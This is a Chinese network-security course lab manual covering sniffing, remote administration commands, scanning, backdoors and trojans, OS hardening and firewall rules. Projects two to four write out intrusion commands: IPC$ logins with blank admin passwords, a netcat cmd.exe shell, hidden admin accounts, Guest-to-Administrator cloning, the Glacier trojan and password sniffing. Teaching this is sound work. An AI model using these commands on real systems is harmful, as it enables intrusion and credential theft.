视频1 视频21 视频41 视频61 视频文章1 视频文章21 视频文章41 视频文章61 推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37 推荐39 推荐41 推荐43 推荐45 推荐47 推荐49 关键词1 关键词101 关键词201 关键词301 关键词401 关键词501 关键词601 关键词701 关键词801 关键词901 关键词1001 关键词1101 关键词1201 关键词1301 关键词1401 关键词1501 关键词1601 关键词1701 关键词1801 关键词1901 视频扩展1 视频扩展6 视频扩展11 视频扩展16 文章1 文章201 文章401 文章601 文章801 文章1001 资讯1 资讯501 资讯1001 资讯1501 标签1 标签501 标签1001 关键词1 关键词501 关键词1001 关键词1501 专题2001
网络安全实验指导
2025-10-02 23:09:10 责编:小OO
文档
项目一   Vmware虚拟机及sniffer抓包软件的使用

项目二   网络基本命令的使用

项目三   扫描和网络监听

项目四   后门与木马

项目五   操作系统安全配置方案

项目六   防火墙技术

项目一   Vmware虚拟机及sniffer抓包软件的使用

一  实验目的

1、学会安装和使用vmware软件并能够熟练配置虚拟机。

2、学会使用sniffer软件抓取数据包。

二  实验设备

1、配置有vmware软件和sniffer软件的电脑多台。

2、局域网环境。

三  实验学时

    4学时

四  实验内容

1、安装vmware虚拟机。

2、配置vmware虚拟机。

1)在虚拟机中装操作系统,选择菜单栏“File”下的“New”菜单项,再选择子菜单“New Virtual Machine”。

2)有两种选择,选项“Typical”是典型安装,选项“Custom”是自定义安装,我们选择“Custom”安装方式。点击按钮“下一步”。

3)进入选择操作系统界面,设置将来要安装的操作系统windows 2000 advanced sever. 点击按钮“下一步”.

4)选择虚拟机的内存大小,我们设置128M.点击下一步。

5)选择虚拟机的连网方式,我们设置为“Used Bridged networking”,点击“下一步”。

6)创建磁盘,我们选择Create a new virtual disk,点击下一步。

7)选择虚拟磁盘所要安装的目录,最后完成。

3、测试vmware虚拟机和局域网中其他电脑的连通性。

1)设置虚拟机的ip(与主机ip在同一网段)。

2)用ping命令测试虚拟机在局域网的连通性。

4、使用sniffer抓包

1)进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。选择主菜单Capture下的Define Filter菜单

2)在Address下拉列表中,选择抓包的类型是IP。

3)点击该窗口的Advanced选项卡,拖动滚动条找到IP项,将IP和ICMP选中。

4)主机的DOS窗口中Ping虚拟机,点击开始键,出现的窗口选择Decode选项卡,可以看到数据包在两台计算机间的传递过程。

五  实验小结

通过本次实验学生能够掌握vmware软件和sniffer软件的使用方法,为以后进一步学习打好基础。

六 注意事项

实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目二  网络基本命令的使用

一  实验目的

1、理解并熟练掌握网络攻击和防御中常见的DOS命令。

2、掌握IPC$技术的攻击及防御的常用方法。

二  实验设备

1、连接到局域网的计算机多台。

2、应用软件:shutdown.exe(远程关机程序);nc.exe(“瑞士军刀”程序)。

三  实验学时

    4学时

四  实验内容

1、利用DOS命令实现远程关机:

1)拷贝工具shutdown.exe到本机目录c:\\winnt\\system32下。

2)输入命令:ping  目标机ip,测试与目标机的是否连通。

3)用net命令进行远程连接:

net  use  \\\目标机ip\\ipc$  “password”  /user:”username”(局域网内计算机用户id为:administrator,用户password为空).

4)输入远程重启计算机指令:

shutdown  -r  -m  \\\目标机ip(命令:shutdown  /?查询shutdown的使用方法)

2、利用nc.exe在远程电脑开启telnet服务:

1)利用net命令同远程电脑建立连接,方法同上。

2)使用copy命令将nc.exe拷贝到远程电脑的C:\\winnt\\system32目录下:

●net use \\\目标机ip\\ipc$ “password” /user:”username”

●copy  \本机路径\\nc.exe  \\\目标机ip\\admin$\\system32

3)利用at命令远程执行程序nc.exe开启telnet服务。

at  \\\目标机IP  time  nc  -l  -p  99(指定端口)  -t  -e  cmd.exe(命令:nc –h查询nc程序的使用方法)

4)利用目标机99端口telnet登陆远程电脑:

telnet 目标机ip  99

3、在远程电脑上新建文件。

4、在远程计算机上创建自己的管理员用户:

1)net  user  username   /add

2)net  localgroup  administrators  username   /add

5、查看当前系统中的用户确认添加用户操作是否成功:

net  user  

6、删除本机ipc$共享:

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete…

7、查看端口操作:

使用命令netstat –an查看本机端口。

五  实验小结

通过本次实验同学们熟练掌握一些常用的网络命令,进一步理解了ipc$技术的漏洞和防御方法。

六 注意事项

    实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目三   扫描和网络监听

一、实验目的

   掌握网络监听的工作机制和作用,学习常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用。

二、实验设备

1、连接到局域网的计算机多台

2、扫描和监听程序,如PortScan、WinSniffer和X-scan等。

三、实验学时

   4学时

四、实验内容

实验需要两台计算机,可在主机的vmware中安装Windows2000Server来代替另一台计算机,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。

1、在主机的vmware中安装Windows2000Server,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。

2、使用扫描和网络监听程序对安装Windows2000Server的服务器进行监听并实现入侵。

    1)使用PortScan对Windows2000Server的服务器进行端口扫描,在“Scan”文本框中输入IP地址,单击按钮“START”,开始扫描。

2)使用X-scan对Windows2000Server的服务器进行网络安全漏洞扫描。在“指定IP范围”中输入对方IP,并在“扫描模块”设置想要扫描的参数,设置完成后,点击“开始扫描”。

3)使用网络监听WinSniffer截取局域网内的密码。安装并打开WinSniffer,单击工具栏图标“Adapter”,设置网卡为本机物理网卡“Realtek RTL8139(A)”,单击“start”开始监听。使用DOS命令行连接远程的FTP服务,抓取密码。

五、实验总结

本次实验使学生掌握常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用方法。

六 注意事项

    实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目四   后门与木马

一  实验目的

    区分木马与后门,掌握常用的后门设置方法,掌握木马冰河的使用、掌握如何设置网络代理跳板。

二  实验设备

1、连接到局域网的计算机多台

2、使用工具:RTCS.vbe、psu.exe、pulist.exe、djxyxs.exe、冰河V8.2、sksockserver.exe、SkServerGUI.exe、sc32r231.exe

三  实验学时

    4学时

四  实验内容

    1、利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。命令的语法是:

“cscript RTCS.vbe 172.18.25.109 administrator 123456  1  23”。

    2、利用工具软件psu.exe得到注册表键值的查看和编辑权。将psu.exe拷贝对方主机的C盘下,并在任务管理器查看对方主机winlogon.exe进程的ID号或者使用pulist.exe文件查看该进程的ID号,执行命令:

“psu -p regedit -i pid”其中pid为Winlogon.exe的进程号。在打开的注册表编辑器中将Guest(0x1f5)中的键值用Administrator(0x1f4)中的键值覆盖。在注册表中将Guest和0x1f5导出,删除,再重新导入。然后执行:

“net user guest (新密码)    --修改guest帐户密码

  net user guest /active:yes      --开启guest帐户

  net user guest /active:no       --停止guest帐户

”     OK!

    3、将djxyxs.exe文件上传并拷贝到对方服务器的Winnt\emp目录下,执行,解压后执行解压出来的azzd.exe文件。该文件使服务器自动重启,使用终端服务连接软件(如mstsc.exe)登陆服务器。

    4、使用“冰河”进行远程控制

    win32.exe文件是服务器端程序,Y_Client.exe文件为客户端程序。将win32.exe文件在远程得计算机上执行以后,通过Y_Client.exe文件来控制远程得服务器。

    5、首先将本地计算机设置为一级代理,将文件拷贝到C盘根目录下,然后将代理服务工具sksockserver.exe安装到主机上。执行步骤为:执行“sksockserver -install”将代理服务安装主机中,执行“sksockserver -config port 1122”将代理服务的端口设置为1122,当然可以设置为其他的数值,执行“sksockserver -config starttype 2”将该服务的启动方式设置为自动启动,执行“net start skserver”启动代理服务。

    在网络上其他的主机上设置二级代理,使用本地代理配置工具:SkServerGUI.exe,在主菜单“配置”下的菜单项“经过的SKServer”设置参数。

    安装sc32r231.exe,安装汉化HBC-SC32231-Ronnier.exe,然后执行该程序。

五  实验总结

通过本次实验使学生能够区分木马与后门,掌握远程开启对方的Telnet服、让禁用的Guest具有管理权限的方法、连接到终端服务的方法,并考虑其防御方法,掌握如何设置网络代理跳板。

六 注意事项

    实验软件有一定的破坏性,有可能影响实验用计算机的正常运行。

项目五   操作系统安全配置方案

一 实验目的

1、掌握操作系统安全配置。

2、掌握操作系统的安全策略配置。

3、掌握操作系统安全信息通信配置。

二 实验设备

1、Windows2000操作系统。

2、局域网环境。

三 实验学时

4学时

四 实验内容

1、操作系统安全配置:

停止Guest帐号、用户数量、创建多个管理员帐号、管理员帐号改名、设置陷阱帐号、更改默认权限、管理员帐号设置安全密码、设置屏幕保护密码。

2、操作系统的安全策略配置:

关闭不必要的服务、关闭不必要的端口、开启审核策略、开启密码策略、开启帐户策略、备份敏感文件、不显示上次登陆名、禁止建立空连接、下载最新的补丁。

3、操作系统安全信息通信配置:

关闭DirectDraw、关闭默认共享、禁用Dump File、熟悉文件加密系统、加密Temp文件夹、锁住注册表、关机时清除文件、禁止软盘光盘启动、禁止判断主机类型、抵抗DDOS、禁止Guest访问日志、使用数据恢复软件恢复已丢失的数据。

五 实验小结

通过本次实验,能够基本掌握操作系统的初级、中级和高级配置。

六 注意事项

    实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目六   防火墙技术

一 实验目的

1、用WinRoute创建包过滤规则 

2、用WinRoute禁用FTP访问 

3、用WinRoute禁用HTTP访问

4、掌握入侵检测工具:BlackICE、冰之眼

二 实验设备

1、Windows操作系统。

2、WinRoute、BlackICE、冰之眼。

三 实验学时

4学时

四 实验内容

1、安装WinRoute

以管理员身份安装该软件,安装完毕后,启动“WinRoute Administration”。默认情况下,该密码为空。点击按钮“OK”,进入系统管理。当系统安装完毕以后,该主机就将不能上网,需要修改默认设置,点击工具栏图标,出现本地网络设置对话框,然后查看“Ethernet”的属性,将两个复选框全部选中。

2、用WinRoute创建包过滤规则

1)选择菜单项“Packet Filter”,选中网卡图标,单击按钮“添加”。出现过滤规则添加对话框,所有的过滤规则都在此处添加。

2)在协议下拉列表中选择“ICMP”,在“ICMP Type”栏目中,将复选框全部选中。在“Action”栏目中,选择单选框“Drop”。在“Log Packet”栏目中选中“Log into Window”,创建完毕后点击按钮“OK”,一条规则就创建完毕。

3)为了使设置的规则生效,点击按钮“应用”。

4)设置完毕,使用指令“Ping”来探测主机,将收不到回应,虽然主机没有响应,但是已经将事件记录到安全日志了。选择菜单栏“View”下的菜单项“Logs>Security Logs”,察看日志纪录。

3、用WinRoute禁用FTP访问 

FTP服务用TCP协议, FTP占用TCP的21端口,主机的IP地址是“目的IP” ,首先利用WinRoute建立访问规则如表:

组序号动作源IP

目的IP

源端口目的端口协议类型
1禁止*“目的IP”

*21TCP
    设置访问规则以后,再访问主机“172.18.25.109”的FTP服务,将遭到拒绝

访问违反了访问规则,会在主机的安全日志中记录下来。

4、用WinRoute禁用HTTP访问

HTTP服务用TCP协议,占用TCP协议的80端口,主机的IP地址是“目的IP” ,首先利用WinRoute建立访问规则如表:

组序号动作源IP

目的IP

源端口目的端口协议类型
1禁止*“目的IP”

*80TCP
打开本地的IE连接远程主机的HTTP服务,将遭到拒绝,访问违反了访问规则,所以在主机的安全日志中记录下来。

5、入侵检测工具:BlackICE。

6、入侵检测工具:冰之眼 

五 实验小结

学会使用WinRoute创建包过滤规则、禁用FTP访问、HTTP访问,掌握入侵检测工具:BlackICE、冰之眼。

六 注意事项

    实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。下载本文

显示全文
专题